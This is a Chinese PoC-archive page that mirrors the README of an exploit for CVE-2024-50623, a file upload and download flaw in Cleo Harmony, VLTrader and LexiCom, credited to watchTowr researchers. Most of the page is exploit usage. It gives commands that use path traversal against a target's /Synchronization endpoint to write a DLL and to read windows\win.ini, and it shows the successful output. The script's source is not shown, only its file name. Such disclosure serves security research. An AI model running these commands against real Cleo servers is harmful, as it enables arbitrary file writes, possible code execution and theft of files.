POC详情: c48bbd0d92dbac3574af9ce5bea6dae300ee2ff8

来源
关联漏洞
标题: Cleo多款产品 安全漏洞 (CVE-2024-50623)
描述:Cleo LexiCom等都是Cleo公司的产品。Cleo LexiCom是一个集成平台。Cleo Harmony是一个文件集成解决方案。Cleo VLTrader是一个安全托管文件传输软件。 Cleo多款产品存在安全漏洞,该漏洞源于包含一个JavaScript注入问题。以下产品及版本受到影响:Cleo Harmony 5.8.0.20版本之前,VLTrader 5.8.0.20版本之前和LexiCom 5.8.0.20版本。
描述
Cleo Unrestricted file upload and download PoC (CVE-2024-50623)
介绍
# CVE-2024-50623
Cleo Unrestricted file upload and download PoC (CVE-2024-50623)


#### Arbitrary File Write

```
python CVE-2024-50623.py --target http://192.168.1.18:5080/Synchronization --action write --what poc.dll --where "..\..\..\..\poc.dll"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-50623.py
        (*) Cleo Unrestricted file upload and download vulnerability (CVE-2024-50623)

          - Sonny and Sina Kheirkhah (@SinSinology) of watchTowr (sina@watchTowr.com)

        CVEs: [CVE-2024-50623]
[INFO] File written successfully

```

#### Arbitrary File Read

```
python CVE-2024-50623.py --target http://192.168.1.18:5080/Synchronization --action read --what CVE-2024-50623.py --where "..\..\windows\win.ini"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-50623.py
        (*) Cleo Unrestricted file upload and download vulnerability (CVE-2024-50623)

          - Sonny and Sina Kheirkhah (@SinSinology) of watchTowr (sina@watchTowr.com)

        CVEs: [CVE-2024-50623]
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```

# Exploit authors

This exploit was written by Sonny and Sina Kheirkhah (@SinSinology) of [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber) 


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber

文件快照

[4.0K] /data/pocs/c48bbd0d92dbac3574af9ce5bea6dae300ee2ff8 ├── [2.9K] CVE-2024-50623.py └── [2.1K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。